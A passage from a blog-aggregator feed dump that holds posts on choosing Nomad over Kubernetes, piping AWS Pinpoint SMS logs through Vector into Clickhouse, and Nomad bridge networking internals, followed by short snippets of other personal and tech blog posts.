Nomad requires dealing with fewer components, making it appear lacking compared to K8s’s concept of everything being a “resource.” However, that is far from the truth.\nIngress: We run a set of HAProxy on a few nodes which act as “L7 LBs”. Configured with Nomad services, they can do the routing based on Host headers.\nDNS: To provide external access to a service without using a proxy, we developed a tool that scans all services registered in the cluster and creates a corresponding DNS record on AWS Route53.\nMonitoring: Ah my fav. You wanna monitor your K8s cluster. Sure, here’s kube-prometheus, prometheus-operator, kube-state-metrics. Choices, choices. Enough to confuse you for days. Anyone who’s ever deployed any of these, tell me why this thing needs such a monstrosity setup of CRDs and operators. Monitoring Nomad is such a breeze, 3 lines of HCL config and done.\nStatefulsets: It’s 2023 and the irony is rich - the recommended way to run a database inside K8s is… not to run it inside K8s at all. In Nomad, we run a bunch of EC2 instances and tag them as db nodes. The DBs don’t float around as containers to random nodes. And there’s no CSI plugin reaching for a storage disk in AZ-1 when the node is basking in AZ-2. Running a DB on Nomad feels refreshingly like running it on an unadorned EC2 instance.\nAutoscale: All our client nodes (except for the db nodes) are ephemeral and part of AWS’s Auto Scaling Groups (ASGs). We use ASG rules for the horizontal scaling of the cluster. While Nomad does have its own autoscale, our preference is to run large instances dedicated to specific workloads, avoiding a mix of different workloads on the same machine.\nOver abstraction of Kubernetes#\nOne of my primary critiques of K8s is its hidden complexities. While these abstractions might simplify things on the surface, debugging becomes a nightmare when issues arise. Even after three years of managing K8s clusters, I’ve never felt confident dealing with databases or handling complex networking problems involving dropped packets.\nYou might argue that it’s about technical chops, which I won’t disagree with - but then do you want to add value to the business by getting shit done or do you want to be the resident K8s whiz at your organization?\nConsider this: How many people do you know who run their own K8s clusters? Even the K8s experts themselves preach about running prod clusters on EKS\u002FGKE etc. How many fully leverage all that K8s has to offer? How many are even aware of all the network routing intricacies managed by kube-proxy? If these queries stir up clouds of uncertainty, it’s possible you’re sipping the Kubernetes Kool-Aid without truly comprehending the recipe, much like I found myself doing at one point\nNomad: Not Perfect, But Simpler#\nNow, if you’re under the impression that I’m singing unabashed praises for Nomad, let me clarify - Nomad has its share of challenges. I’ve personally encountered and reported several. However, the crucial difference lies in Nomad’s lesser degree of abstraction, allowing for a comprehensive understanding of its internals. For instance, we encountered service reconciliation issues with a particular Nomad version. However, we could query the APIs, identify the problem, and write a bash script to resolve and reconcile it. It wouldn’t have been possible when there are too many moving parts in the system and we don’t know where to even begin debugging.\nThe YAML hell is all too well known to all of us. In K8s, writing job manifests required a lot of effort (by the developers who don’t work with K8s all day) and were very complex to understand. It felt “too verbose” and involved copy pasting large blocks from the docs and trying to make things work. Compare that to HCL, it feels much nicer to read and shorter. Things are more straightforward to understand.\nI’ve not even touched upon the nice-ities on Nomad yet. Like better humanly understandable ACLs? Cleaner and simpler job spec, which defines the entire job in one file? A UI which actually shows everything about your cluster, nodes, and jobs? Not restricting your workloads to be run as Docker containers? A single binary which powers all of this?\nThe central question this post aims to raise is: What can K8s do that Nomads can’t, especially considering the features people truly need? My perspectives are informed not only by my organization but also through interactions with several other organizations at various meetups and conferences. Yet, I have rarely encountered a use case that could only be managed by K8s. While Nomad isn’t a panacea for all issues, it’s certainly worth a try. Reducing the complexity of your tech stack can prove beneficial for your applications and, most importantly, your developers.\nAt this point, K8s enjoys immense industry-wide support, while Nomad remains the unassuming newcomer. This contrast is not a negative aspect, per se. Large organizations often gravitate towards complexity and the opportunity to engage more engineers. However, if simplicity were the primary goal, the prevailing sense of overwhelming complexity in the infrastructure and operations domain wouldn’t be as pervasive.\nConclusion#\nI hope my arguments provide a more comprehensive perspective and address the earlier critique of being unsubstantiated.\nUpdate#\nINFO\n    \nDarren has responded to this blog post. You can read the response on Twitter.\nFin!",[],{"slug":1204,"title":1205,"link":1206,"pubDate":1207,"contentSnippet":1208,"tags":1209,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-17","Emerging from dotemacs bankruptcy the hard way: the midway refactor","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-midway-refactor\u002Findex.html","Sun, 23 Jul 2023 00:00:00 +0000","Or the one in which we confront our elisp n00bishness and try to be better at using it. And we learn new habits to understand our Emacs better. Better late than never.",[227,1144,457,1108],{"slug":1211,"title":1212,"link":1213,"pubDate":1214,"contentSnippet":1215,"tags":1216,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"storing-aws-pinpoint-logs","Storing AWS Pinpoint Logs","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstoring-aws-pinpoint-logs\u002F","2023-07-21T05:24:06.000Z","At $dayjob, we use AWS Pinpoint to send out SMS to our customers. We’ve also written a detailed blog post on how we use Clickhouse + vector stack for our logging needs. We additionally wanted to store the delivery logs generated by the Pinpoint service. But like with anything else in AWS, even simpler tasks like these usually tend to piggyback on other counterparts of AWS - in this case, it happens to be AWS Kinesis. All the delivery logs which contain metadata about SMS delivery are streamed to Kinesis.\nOur setup involves configuring Pinpoint with Amazon Kinesis Data Firehose stream. Firehose is an ETL service that helps stream events to other persistent stores. Firehose supports multiple such output sinks and in our case we use HTTP sink.\nThis is what the flow looks like:\nPinpoint -> Kinesis Firehose -> Vector HTTP -> Clickhouse\nIngesting Data#\nOn the HTTP server side, we used vector’s aws_kinesis_firehose source. Compared to just using http source, here are the differences I found:\nHas first-class support for access_key. AWS Kinesis can be configured to send access_key which comes as the value X-Amz-Firehose-Access-Key header in the HTTP request. This means that the request which contains an invalid access key will be rejected at the source itself. However, in the http source, I couldn’t find a way to drop events at the source level. It is required to use a VRL transformer to check whether X-Amz-Firehose-Access-Key is present in the headers and do a value comparison with our key.\nHas native support for base64 decoding the payload. This one’s pretty useful and saved me a lot of VRL transformer rules that I would have otherwise written with the http source. So, basically, this is how the server receives the payload:\n{\n  \"requestId\": \"6a14a06b-6eae-4218-...\",\n  \"timestamp\": 1689766125971,\n  \"records\": [\n      {\n          \"data\": \"eyJld...\"\n      },\n      {\n          \"data\": \"eyJldmVudF9...\"\n      }\n  ]\n}\nThe value of the payload is a base64 encoded value of the JSON Object of an SMS event. However, the aws_kinesis_firehose source is smart enough and automagically decodes this list of records and their values into individual events. This is how the final event looks like when using aws_kinesis_firehose source:\n    {\n      \"message\": \"{\\\"event_type\\\":\\\"_SMS.SUCCESS\\\",\\\"event_timestamp\\\":1689827914426,\\\"arrival_timestamp\\\":1689827917659,\\\"event_version\\\":\\\"3.1\\\",\\\"application\\\":{\\\"app_id\\\":\\\"redacted\\\",\\\"sdk\\\":{}},\\\"client\\\":{\\\"client_id\\\":\\\"redacted\\\"},\\\"device\\\":{\\\"platform\\\":{}},\\\"session\\\":{},\\\"attributes\\\":{\\\"sender_request_id\\\":\\\"redacted\\\",\\\"destination_phone_number\\\":\\\"+91xxx\\\",\\\"record_status\\\":\\\"DELIVERED\\\",\\\"iso_country_code\\\":\\\"IN\\\",\\\"mcc_mnc\\\":\\\"xxx\\\",\\\"number_of_message_parts\\\":\\\"1\\\",\\\"message_id\\\":\\\"redacted\\\",\\\"message_type\\\":\\\"Transactional\\\",\\\"origination_phone_number\\\":\\\"redactedORG\\\"},\\\"metrics\\\":{\\\"price_in_millicents_usd\\\":xx.0},\\\"awsAccountId\\\":\\\"redacted\\\"}\\n\",\n      \"request_id\": \"6dd45388-xxx\",\n      \"source_arn\": \"arn:aws:firehose:ap-south-1:redacted:deliverystream\u002Fredacted\",\n      \"source_type\": \"aws_kinesis_firehose\",\n      \"timestamp\": \"2023-07-20T04:39:38.772Z\"\n  }\nThis makes it straightforward because now we just have to parse the JSON inside the message key and do transformations on that object. If it was http source, then I’d to loop over the records structure and figure out how to split them as individual events for the rest of the Vector pipeline… which would have been messy to say the least.\nHere’s the vector config so far:\n[sources.firehose]\n# General\ntype = \"aws_kinesis_firehose\"\naddress = \"127.0.0.1:9000\"\nstore_access_key = false\naccess_keys = [\"superdupersecret\"]\n\n# Use it for debugging\n[sinks.console]\ntype = \"firehose\"\ninputs = [\"format_pinpoint_logs\"]\nencoding.codec = \"json\"\n\nFormatting the data#\nNow that we have a pipeline which sends and receives data, we can process the events and transform them into a schema that is more desirable. Since we require the events to be queryable in a Clickhouse DB, this is the schema we have:\nCREATE TABLE default.pinpoint_logs (\n    `_timestamp` DateTime('Asia\u002FKolkata'),\n    `app_id` LowCardinality(String),\n    `event_type` LowCardinality(String),\n    `record_status` LowCardinality(String),\n    `origination_phone_number` String,\n    `message_id` String,\n    `destination_phone_number` String,\n    `arrival_timestamp` DateTime('Asia\u002FKolkata'),\n    `event_timestamp` DateTime('Asia\u002FKolkata'),\n    `meta` Nullable(String)\n)\nENGINE = MergeTree\nPARTITION BY toYYYYMM(_timestamp)\nORDER BY _timestamp\nSETTINGS index_granularity = 8192;\nTo achieve the above format, we can use VRL to parse and format our SMS events:\n[transforms.format_pinpoint_logs]\ntype = \"remap\" \ninputs = [\"firehose\"] \nsource = '''\n  # Decode the JSON message and set ingestion timestamp\n  .message = parse_json!(.message)\n  .ingestion_timestamp = .timestamp\n\n  # Convert timestamps from Unix to DateTime\n  .event_timestamp = from_unix_timestamp!(.message.event_timestamp, unit:\"milliseconds\")\n  .arrival_timestamp = from_unix_timestamp!(.message.arrival_timestamp, unit:\"milliseconds\")\n\n  # Extract keys to top level and remove from attributes\n  .record_status = del(.message.attributes.record_status)\n  .origination_phone_number = del(.message.attributes.origination_phone_number)\n  .destination_phone_number = del(.message.attributes.destination_phone_number)\n  .message_id = del(.message.attributes.message_id)\n\n  # Encode the remaining attributes as JSON string\n  .attr = encode_json(.message.attributes)\n\n  # Format Payload for Clickhouse\n  . = {\n    \"_timestamp\": .ingestion_timestamp,\n    \"arrival_timestamp\": .arrival_timestamp,\n    \"event_timestamp\": .event_timestamp,\n    \"app_id\": .message.application.app_id,\n    \"event_type\": .message.event_type,\n    \"record_status\": .record_status,\n    \"message_id\": .message_id,\n    \"origination_phone_number\": .origination_phone_number,\n    \"destination_phone_number\": .destination_phone_number,\n    \"meta\": .attr\n  }\n'''\n\nPlugging this, we have a clean JSON object for each SMS event. The only thing now we need to add is an output sink to Clickhouse:\n[sinks.clickhouse]\ntype = \"clickhouse\"\ninputs = [\"format_pinpoint_logs\"]\nskip_unknown_fields = true\ncompression = \"gzip\"\ndatabase = \"default\"\nendpoint = \"http:\u002F\u002F127.0.0.1:8123\"\ntable = \"pinpoint_logs\"\nencoding.timestamp_format = \"unix\"\nbatch.max_bytes = 1049000 # 1 MB\nbatch.timeout_secs = 5\nbuffer.max_size = 268435488\nbuffer.type = \"disk\"\nbuffer.when_full = \"block\"\nPerfect! On running this pipeline with vector -c config.toml we can see the consumption the records\nHope this short post was useful if you’ve to do anything similar!\nFin!",[],{"slug":1218,"title":1219,"link":1220,"pubDate":1221,"contentSnippet":1222,"tags":1223,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"bridge-network-in-nomad","Bridge Networking in Nomad","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbridge-network-in-nomad\u002F","2023-07-17T05:45:04.000Z","To set the stage, it’s crucial to understand what we mean by “bridge networking”. In a nutshell, it is a type of network connection in Linux that allows virtual interfaces, like the ones used by virtual machines and containers, to share a physical network interface.\nWith Nomad, when a task is allocated, it creates a network namespace with its own network stack. Within this, a virtual ethernet (veth) pair is established, one end of which is assigned to the network namespace of the allocation, and the other remains in the host namespace.\n\nThe Network Journey#\nTo illustrate this practically, let’s assume a packet is sent from a task within an allocation. The packet would first be received by the local end of the veth pair, it would then traverse to the other end residing in the host’s namespace. From there, it is sent to the bridge on the host (in this case, the “nomad” bridge), which finally sends the packet out to the world via the host’s physical network interface (typically “eth0” or equivalent in your machine).\nThe journey of a packet from the outside world to a task inside an allocation is the exact mirror image. The packet reaches “eth0” first, then the nomad bridge, it is then forwarded to the appropriate veth interface in the host’s namespace. From there, it crosses over to the other end of the veth pair in the allocation’s network namespace and finally gets routed to the destination task.\nTo bridge or not to#\nLet’s take a look at the following jobspec which is for deploying my tiny side project - Cloak on Nomad\njob \"cloak\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"redis\" {\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\n\n    service {\n      name     = \"cloak-redis\"\n      port     = \"redis\"\n      provider = \"nomad\"\n    }\n\n\n    task \"redis\" {\n      driver = \"docker\"\n\n\n      config {\n        image                  = \"redis:7\"\n        advertise_ipv6_address = false\n\n        ports = [\n          \"redis\",\n        ]\n\n        volumes = [\n          \"\u002Fdata\u002Fcloak\u002Fredis:\u002Fdata\",\n        ]\n      }\n\n      resources {\n        cpu    = 500 # MHz\n        memory = 256 # MB\n      }\n    }\n  }\n\n  group \"cloak\" {\n    network {\n      mode = \"host\"\n      port \"cloak\" {\n        static = 7000\n        to     = 7000\n      }\n    }\n\n    task \"cloak\" {\n      driver = \"docker\"\n\n      config {\n        image   = \"ghcr.io\u002Fmr-karan\u002Fcloak:v0.2.0\"\n        command = \"--config=config.toml\"\n        ports = [\n          \"cloak\",\n        ]\n      }\n\n      template {\n        data        = \u003C\u003CEOH\n# Configuration for 1 redis instances, as assigned via rendezvous hashing.\n{{$allocID := env \"NOMAD_ALLOC_ID\" -}}\n{{range nomadService 1 $allocID \"cloak-redis\"}}\nCLOAK_REDIS__address={{ .Address }}:{{ .Port }}\n{{- end}}\nEOH\n        destination = \"secrets\u002Ffile.env\"\n        env         = true\n      }\n\n\n      resources {\n        cpu    = 500 # MHz\n        memory = 700 # MB\n      }\n    }\n  }\n}\nOur focus should be on the network.mode stanza. To illustrate what happens behind the scenes when an alloc runs in network.mode=host (host network), we can run the above job.\nOn the machine, we can see that port 7000 (static) and port 27042 (dynamic) are allocated on the host network interface (eth0):\n\nWe can also see the port and process details using ss:\nsudo ss -ltpn 'sport = :7000'\nState    Recv-Q   Send-Q      Local Address:Port       Peer Address:Port   Process\nLISTEN 0 4096      95.216.165.210:7000    0.0.0.0:*  users:((\"docker-proxy\",pid=67068,fd=4))\nThis config is more suitable for specific workloads - like load balancers or similar deployments where you want to expose the network interface on the host. It’s also helpful for applications running outside of Nomad on that host to connect via the host network interface.\nHowever, typically in a job where you want to connect to multiple different allocs - you’d want to set up a bridge network. This generally avoids exposing the workload on the host network directly. It’s a typical setup where you want to put applications behind a reverse proxy (NGINX\u002FCaddy).\nLet’s change network.mode=bridge in the above job spec and see the changes.\n$ nomad job plan cloak.nomad\n\n+\u002F- Job: \"cloak\"\n+\u002F- Task Group: \"cloak\" (1 create\u002Fdestroy update)\n  + Network {\n      Hostname: \"\"\n    + MBits:    \"0\"\n    + Mode:     \"bridge\"\n    + Static Port {\n      + HostNetwork: \"default\"\n      + Label:       \"cloak\"\n      + To:          \"7000\"\n      + Value:       \"7000\"\n      }\n    }\n  - Network {\n      Hostname: \"\"\n    - MBits:    \"0\"\n    - Mode:     \"host\"\n    - Static Port {\n      - HostNetwork: \"default\"\n      - Label:       \"cloak\"\n      - To:          \"7000\"\n      - Value:       \"7000\"\n      }\n    }\n    Task: \"cloak\"\n\n+\u002F- Task Group: \"redis\" (1 create\u002Fdestroy update)\n  + Network {\n      Hostname: \"\"\n    + MBits:    \"0\"\n    + Mode:     \"bridge\"\n    + Dynamic Port {\n      + HostNetwork: \"default\"\n      + Label:       \"redis\"\n      + To:          \"6379\"\n      }\n    }\n  - Network {\n      Hostname: \"\"\n    - MBits:    \"0\"\n    - Mode:     \"host\"\n    - Dynamic Port {\n      - HostNetwork: \"default\"\n      - Label:       \"redis\"\n      - To:          \"6379\"\n      }\n    }\n    Task: \"redis\"\nNow we don’t see the ports forwarded on the host network:\n\nSimilarly, ss also shows no process listening on the host network\n\nIPTables and Routing#\nTo understand what happened when we switched the networking mode to bridge, we need to take a look at the Nomad iptables magic which comes into play when using bridge network.\nI pulled up the iptables and saw specific rules under the chains CNI-FORWARD and NOMAD-ADMIN. These rules, in essence, allow all traffic to and from the allocation’s network namespace.\n$ sudo iptables -L CNI-FORWARD\nChain CNI-FORWARD (1 references)\ntarget     prot opt source               destination         \nNOMAD-ADMIN  all  --  anywhere             anywhere             \u002F* CNI firewall plugin admin overrides *\u002F\nACCEPT     all  --  anywhere             172.26.64.5          ctstate RELATED,ESTABLISHED\nACCEPT     all  --  172.26.64.5          anywhere            \nACCEPT     all  --  anywhere             172.26.64.6          ctstate RELATED,ESTABLISHED\nACCEPT     all  --  172.26.64.6          anywhere\n\nsudo iptables -L NOMAD-ADMIN\nChain NOMAD-ADMIN (1 references)\ntarget     prot opt source               destination         \nACCEPT     all  --  anywhere             172.26.64.0\u002F20\nNomad uses 172.26.64.0\u002F20 as the default subnet for the bridge network. The IPs 172.26.64.5 and 172.26.64.6 are assigned to 2 different allocs in this CIDR. The iptables rules allow complete traffic to flow on this subnet.\nTo check the routing,ip route command can be used.\n$ ip route show 172.26.64.0\u002F20\n172.26.64.0\u002F20 dev nomad proto kernel scope link src 172.26.64.1\nIt uses the nomad network interface for routing packets related to the default bridge network.\nUsing nsenter we can find more details about the network namespace created for an alloc. Let’s find details about the redis alloc:\nsudo nsenter -t $(pgrep redis) --net ip addr\n\n1: lo: \u003CLOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\u002Floopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\u002F8 scope host lo\n       valid_lft forever preferred_lft forever\n2: eth0@if113: \u003CBROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default \n    link\u002Fether 76:47:6d:49:00:c0 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet 172.26.64.5\u002F20 brd 172.26.79.255 scope global eth0\n       valid_lft forever preferred_lft forever\n\nWe can see that one end of the pair is eth0 (container’s default gateway) which is connected to a network interface with an index 113. For the tunnel to actually work, the veth pair should also exist on the host:\n$ ip a\n113: veth3402deda@if2: \u003CBROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master nomad state UP group default \n    link\u002Fether 3a:85:1b:37:75:17 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet6 fe80::3885:1bff:fe37:7517\u002F64 scope link \n       valid_lft forever preferred_lft forever\nSo, when we see veth3402deda@if2 in the host’s network namespace (with the index 113), and then we see eth0@if113 inside the Redis container, we can infer that these two interfaces form a veth pair: veth3402deda@if2 on the host side and eth0 inside the container. This connection enables the container to communicate with the external network through the host’s network stack.\nCapturing packets#\nWe can capture TCP packets on the veth interface to see the routing work:\nsudo tcpdump -i veth971858d5 -n\ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on veth971858d5, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n10:51:27.801319 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [S], seq 1331933249, win 65495, options [mss 65495,sackOK,TS val 248300785 ecr 0,nop,wscale 7], length 0\n10:51:27.801549 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [S.], seq 107697826, ack 1331933250, win 65160, options [mss 1460,sackOK,TS val 3965422857 ecr 248300785,nop,wscale 7], length 0\n10:51:27.801616 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 1, win 512, options [nop,nop,TS val 248300785 ecr 3965422857], length 0\n10:51:27.801737 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [P.], seq 1:79, ack 1, win 512, options [nop,nop,TS val 248300786 ecr 3965422857], length 78\n10:51:27.801751 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [.], ack 79, win 509, options [nop,nop,TS val 3965422858 ecr 248300786], length 0\n10:51:27.802022 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [P.], seq 1:4097, ack 79, win 509, options [nop,nop,TS val 3965422858 ecr 248300786], length 4096\n10:51:27.802059 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 4097, win 491, options [nop,nop,TS val 248300786 ecr 3965422858], length 0\n10:51:27.802120 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [P.], seq 4097:5396, ack 79, win 509, options [nop,nop,TS val 3965422858 ecr 248300786], length 1299\n10:51:27.802135 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 5396, win 502, options [nop,nop,TS val 248300786 ecr 3965422858], length 0\n10:51:27.803484 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [F.], seq 79, ack 5396, win 512, options [nop,nop,TS val 248300787 ecr 3965422858], length 0\n10:51:27.803567 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [F.], seq 5396, ack 80, win 509, options [nop,nop,TS val 3965422859 ecr 248300787], length 0\n10:51:27.803597 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 5397, win 512, options [nop,nop,TS val 248300787 ecr 3965422859], length 0\n10:53:08.523431 IP 172.26.64.6.53042 > 95.216.165.210.27372: Flags [.], ack 2169295212, win 501, options [nop,nop,TS val 735542538 ecr 4133067854], length 0\n10:53:08.523551 IP 95.216.165.210.27372 > 172.26.64.6.53042: Flags [.], ack 1, win 509, options [nop,nop,TS val 4133379150 ecr 735231242], length 0\n10:53:08.523554 IP 95.216.165.210.27372 > 172.26.64.6.53042: Flags [.], ack 1, win 509, options [nop,nop,TS val 4133379150 ecr 735231242], length 0\n10:53:08.523562 IP 172.26.64.6.53042 > 95.216.165.210.27372: Flags [.], ack 1, win 501, options [nop,nop,TS val 735542538 ecr 4133379150], length 0\n\nTo summarize the output, we can see that the log is showing a TCP connection between 172.26.64.1 (source) and 172.26.64.6 (destination), specifically on port 7000. 172.26.64.1 happens to be the gateway for nomad subnet.\nSummary#\nHope this post clarified some networking internals and behind the scenes magic when using Nomad bridge networking. Refer to my other post - Nomad networking explained for a practical breakdown of all the different ways to expose and connect applications in a Nomad cluster.\nFin!",[],{"slug":1225,"title":1226,"link":1227,"pubDate":1228,"contentSnippet":1229,"tags":1230,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"blog-bts-community-event-part-2","Behind the scenes of organising a community-driven event - part 2","https:\u002F\u002Fwww.divyamohan.com\u002Fblog-bts-community-event-part-2\u002F","Fri, 07 Jul 2023 08:05:48 GMT","In the first part of the series, I discussed our why behind organizing a community-driven event that was also the very first edition of Kubernetes Community Days in Mumbai. In this post, we'll dive into the juicy bits of how we went about setting the stage (very literally)",[701,1231,1232,1233],"KCD Mumbai","Community","Blog",{"slug":1235,"title":1236,"link":1237,"pubDate":1238,"contentSnippet":1239,"tags":1240,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-18","Emerging from dotemacs bankruptcy the hard way: package management","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-packages\u002Findex.html","Thu, 06 Jul 2023 00:00:00 +0000","Elpa, Melpa, git repo. Vendor package straight from source. It compiled? Fetch some more! Elpa, Melpa, git repo. In more adult terms, we learn to use use-package to fetch, install, initialise, configure useful packages that enhance our Emacs experience.",[227,1144,457,1108],{"slug":1242,"title":1243,"link":1244,"pubDate":1245,"contentSnippet":1246,"tags":1247,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-19","Emerging from dotemacs bankruptcy the hard way: init begins","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-init-begins\u002Findex.html","Tue, 04 Jul 2023 00:00:00 +0000","The first action must, of course, be to colour the bikeshed and set some decent defaults.",[227,1144,457,1108],{"slug":1249,"title":1250,"link":1251,"pubDate":1252,"contentSnippet":1253,"tags":1254,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-20","Emerging from dotemacs bankruptcy the hard way: Prelude","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy\u002Findex.html","Thu, 29 Jun 2023 00:00:00 +0000","Or, finally biting the bullet to redesigning my developerly and writerly experience, from the ground up, with Emacs.",[227,1144,457,1108],{"slug":1256,"title":1257,"link":1258,"pubDate":1259,"contentSnippet":1260,"tags":1261,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"what-do-free-bus-rides-for-women-do","Free bus rides for women: What change do they bring?","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fwhat-do-free-bus-rides-for-women-do\u002F","Tue, 27 Jun 2023 01:00:50 +0530","Recently, I read news about Karnataka state government announcing free bus rides for women in the state. It was in the Indian National Congress’ pre-election guarantee, so no big surprise on the announcement. I wondered what changes this announcement makes in terms of people’s lives, even when the Delhi government announced such a scheme earlier. I thought such a decision is far from attaining any real goals of women safety and is only an easy way for politicians to earn some goodwill in the name of gender equality, rather than doing any long term work for gender equality. Earlier when I saw advertisements of providing free bus tickets by the Delhi government, they never mentioned any claims on what this move is intended for. One thing I could infer was that greater number of women going out may impact safety, but I was overall not sure on what this policy achieves.\nI got a new perspective on the issue when, a couple of days ago, I read an article by The Guardian on the same topic. Then I found another article with similar arguments in the Indian Express. Later I read a report in the Times of India on how free bus ride scheme helped women in Chennai. These writeups shed light on the benefits of free bus rides to women which I could not think of myself (shows my ignorance:( ).\nYou can click on the links of the articles and read them there. But I will summarize here: In India, many women rely on family males for money (which is also used as a form of control) and so they have to rely on their savings to travel. I also had misconception, due to the scheme’s counterpart in Delhi, that the fares of city buses are not much to make a real difference. But in the Karnataka case they are. I know from my experience that Karnataka’s capital city Bengaluru has expensive public transport compared to other Indian cities. For example, bus fare from Bengaluru Airport to Satellite Bus station, which is also in Bengaluru, was 246 Indian Rupees six years ago, and I have never seen such a high price in a city bus run by government within any other Indian city. Also, due to scheme being available in the whole state, which I somehow overlooked, women will be able to get free rides for which they would have to pay huge amount otherwise. This will boost their savings, ease travel for women, increase the number of women in public transport leading to even more women travelling in buses. It is also expected to increase women participation in labour which matters in a country where women labour participation is very low. Obviously, such a scheme also needs to be evaluated in terms of economic terms and bigger picture of state finances, but the point is that the scheme has a lot of potential and upsides, where I struggled to find any.",[],{"slug":1263,"title":1264,"link":1265,"pubDate":1266,"contentSnippet":1267,"tags":1268,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"blog-bts-community-event","Behind the scenes of organising a community-driven event - part 1","https:\u002F\u002Fwww.divyamohan.com\u002Fblog-bts-community-event\u002F","Thu, 22 Jun 2023 06:14:32 GMT","I'll be the first one to admit - I had absolutely no plans of writing anything about organizing community-driven events. After all, organizing one (and helping co-organize another, as a volunteer) didn't make me an expert. \n\nAdditionally, as far as I was concerned, there was nothing",[701,1231,1232],{"slug":1270,"title":1271,"link":1272,"pubDate":1273,"contentSnippet":1274,"tags":1275,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"insider-threat","Why Indian Companies Are More Vulnerable To Insider Threats","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Finsider-threat\u002F","Wed, 21 Jun 2023 13:00:50 +0000","What exactly are Insider Threats? An insider threat is a perceived threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization’s security practices, data and computer systems. The threat may involve fraud, the theft of confidential or commercially valuable information, the theft of intellectual property, or the sabotage of computer systems.\nThink of it like this: Let’s say some organisation has a super secure facility, with huge perimeter walls, barbed wires, cameras everywhere.",[],{"slug":1277,"title":1278,"link":1279,"pubDate":1280,"contentSnippet":1281,"tags":1282,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-21","What have you been curious about?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhat-have-you-been-curious-about\u002Findex.html","Wed, 21 Jun 2023 00:00:00 +0000","Arguably a more interesting, revealing, and kinder question than \"What are you curious about?\"",[55,49],{"slug":1284,"title":1285,"link":1286,"pubDate":1287,"contentSnippet":1288,"tags":1289,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-22","Software demos as deliberate acts of serious play","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsoftware-demos\u002Findex.html","Sun, 04 Jun 2023 00:00:00 +0000","Making a software demo is a form of deliberate, serious play. An act that feeds our curiosity, inventiveness, and drive. It enlivens. It enriches. It entertains. And as we asymptotically approach the A.G.I. that's just around the corner, the capacity for deliberate, serious play will remain distinctively, deeply, deliciously human. Career software people like yours truly may please take note!",[227,53,54,531,55],{"slug":1291,"title":1292,"link":1293,"pubDate":1294,"contentSnippet":1295,"tags":1296,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"this-time-it-feels-different","This time, it feels different","https:\u002F\u002Fnadh.in\u002Fblog\u002Fthis-time-it-feels-different\u002F","Sat, 13 May 2023 00:00:00 +0000","In an earlier post (2021) , I argued that much of the “powered by AI \u002F ML” labelling and marketing out there was bogus and disingenuous. That AI \u002F ML technologies were getting commoditised to the point of being as simple as pip install, where most organisations would not need to do any serious R&D to be able to use these technologies, enough to warrant the claim “Powered by AI \u002F ML”. Excerpt from the post:",[],{"slug":1298,"title":1299,"link":1300,"pubDate":1301,"contentSnippet":1302,"tags":1303,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"learning-journey","Covid Lockdowns, And My Learning Journey","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Flearning-journey\u002F","Sat, 06 May 2023 18:29:57 +0000","Yesterday, I was just sitting and thinking about my time spent in COVID lockdowns. It was a harsh period for the whole world. It was a terrible year for everyone, millions of people died. While all my friends were stuck inside their homes playing video games, watching movies and doing other things. I wanted to do something productive. I was 13 years old at that time. That reminds me of this quote from the Harry Potter books: “Happiness can be found, even in the darkest of times, if one only remembers to turn on the 